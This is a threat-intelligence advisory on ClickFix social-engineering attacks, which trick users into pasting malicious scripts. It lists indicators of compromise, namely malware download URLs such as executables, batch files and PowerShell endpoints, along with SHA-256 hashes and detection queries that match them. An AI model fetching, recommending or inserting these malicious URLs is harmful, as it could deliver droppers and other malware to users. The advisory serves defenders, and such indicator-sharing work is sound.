Recent Surge in ClickFix Activity

    Tuesday, December 9, 2025 In: Threat Research Print

    Date: 12/09/2025

    Severity: Medium

    Summary

    ClickFix is a social-engineering technique that tricks users into pasting malicious scripts—often injected into the clipboard through pastejacking—into terminals or run windows, leading to system compromise. Since September 2025, detections have surged to over 200 compromised sites daily, driven by lures that mimic Google’s “Aw Snap!” error or fake browser update pages. These fraudulent pages guide victims through steps that ultimately deliver malware such as droppers, downloaders, and malicious browser extensions.

    Indicators of Compromise (IOC) List

    URLs/Domains

    http://45.59.114.133/test.exe 

    http://52.14.189.234/424.php 

    http://77.0x6E.107.232/only/floid.gz 

    http://89.23.107.240:7777/confirmm2.com/Capcha 

    http://93.152.230.54/

    http://94.74.164.136/fifx.odd 

    http://194.87.55.59/rex.odd 

    https://ab7r3c.top/921tgE/ps1.php 

    http://acsolucionessa.com/1

    https://channelengine-market1.app/ 

    https://cutt.ly/keIDO0T5 

    https://elonpx.com/build.exe 

    https://files.catbox.moe/uaa9w6.txt 

    https://gvh.b-3-aconz.ru/  

    https://hafen.auricfluss.ru/9ctsqhi9 

    https://hafen.auricfluss.ru/teeyde9u 

    https://krone.frostweald.ru/g490ngrc 

    https://movarana.com/HuagW13_1.txt 

    https://softwaretech.pro/r9 

    https://update.coinmarketsap.com/ 

    http://updatesbrows.app/appp.bat 

    https://wald.rowanstead.ru/gu5ngeu0 

    Hash

    39eba783cb48bd00415b75f5b9d0678c4508d2ba0970c394913df3d38c652cf2

    4853a6eed666bd3ed28653de68576948d72e54df00adf3d49de63400bf728baa

    4574c18b6c8aad7d36939a7a19cc8103d2adb093a1f70f2ae54cd97c44b9b22c

    05bfa05140fffee6027d23a926c37d0e8cf88079bb51b01eb190f5aaaec9b946

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    sha256hash IN ("39eba783cb48bd00415b75f5b9d0678c4508d2ba0970c394913df3d38c652cf2","4853a6eed666bd3ed28653de68576948d72e54df00adf3d49de63400bf728baa","4574c18b6c8aad7d36939a7a19cc8103d2adb093a1f70f2ae54cd97c44b9b22c","05bfa05140fffee6027d23a926c37d0e8cf88079bb51b01eb190f5aaaec9b946")

    Detection Query 2 :

    domainname like "http://194.87.55.59/rex.odd" or siteurl like "http://194.87.55.59/rex.odd" or url like "http://194.87.55.59/rex.odd" or domainname like "https://files.catbox.moe/uaa9w6.txt" or siteurl like "https://files.catbox.moe/uaa9w6.txt" or url like "https://files.catbox.moe/uaa9w6.txt" or domainname like "https://ab7r3c.top/921tgE/ps1.php" or siteurl like "https://ab7r3c.top/921tgE/ps1.php" or url like "https://ab7r3c.top/921tgE/ps1.php" or domainname like "http://45.59.114.133/test.exe" or siteurl like "http://45.59.114.133/test.exe" or url like "http://45.59.114.133/test.exe" or domainname like "https://krone.frostweald.ru/g490ngrc" or siteurl like "https://krone.frostweald.ru/g490ngrc" or url like "https://krone.frostweald.ru/g490ngrc" or domainname like "https://movarana.com/HuagW13_1.txt" or siteurl like "https://movarana.com/HuagW13_1.txt" or url like "https://movarana.com/HuagW13_1.txt" or domainname like "https://gvh.b-3-aconz.ru/" or siteurl like "https://gvh.b-3-aconz.ru/" or url like "https://gvh.b-3-aconz.ru/" or domainname like "https://cutt.ly/keIDO0T5" or siteurl like "https://cutt.ly/keIDO0T5" or url like "https://cutt.ly/keIDO0T5" or domainname like "https://update.coinmarketsap.com/" or siteurl like "https://update.coinmarketsap.com/" or url like "https://update.coinmarketsap.com/" or domainname like "http://52.14.189.234/424.php" or siteurl like "http://52.14.189.234/424.php" or url like "http://52.14.189.234/424.php" or domainname like "https://elonpx.com/build.exe" or siteurl like "https://elonpx.com/build.exe" or url like "https://elonpx.com/build.exe" or domainname like "https://softwaretech.pro/r9" or siteurl like "https://softwaretech.pro/r9" or url like "https://softwaretech.pro/r9" or domainname like "http://89.23.107.240:7777/confirmm2.com/Capcha" or siteurl like "http://89.23.107.240:7777/confirmm2.com/Capcha" or url like "http://89.23.107.240:7777/confirmm2.com/Capcha" or domainname like "https://wald.rowanstead.ru/gu5ngeu0" or siteurl like "https://wald.rowanstead.ru/gu5ngeu0" or url like "https://wald.rowanstead.ru/gu5ngeu0" or domainname like "http://94.74.164.136/fifx.odd" or siteurl like "http://94.74.164.136/fifx.odd" or url like "http://94.74.164.136/fifx.odd" or domainname like "http://acsolucionessa.com/1" or siteurl like "http://acsolucionessa.com/1" or url like "http://acsolucionessa.com/1" or domainname like "http://93.152.230.54/" or siteurl like "http://93.152.230.54/" or url like "http://93.152.230.54/" or domainname like "https://channelengine-market1.app/" or siteurl like "https://channelengine-market1.app/" or url like "https://channelengine-market1.app/" or domainname like "https://hafen.auricfluss.ru/9ctsqhi9" or siteurl like "https://hafen.auricfluss.ru/9ctsqhi9" or url like "https://hafen.auricfluss.ru/9ctsqhi9" or domainname like "https://hafen.auricfluss.ru/teeyde9u" or siteurl like "https://hafen.auricfluss.ru/teeyde9u" or url like "https://hafen.auricfluss.ru/teeyde9u" or domainname like "http://updatesbrows.app/appp.bat" or siteurl like "http://updatesbrows.app/appp.bat" or url like "http://updatesbrows.app/appp.bat" or domainname like "http://77.0x6E.107.232/only/floid.gz" or siteurl like "http://77.0x6E.107.232/only/floid.gz" or url like "http://77.0x6E.107.232/only/floid.gz"

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-12-03-recent-surge-in-ClickFix-activity.txt


    Tags

    MalwareClickFixSocial Engineering

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.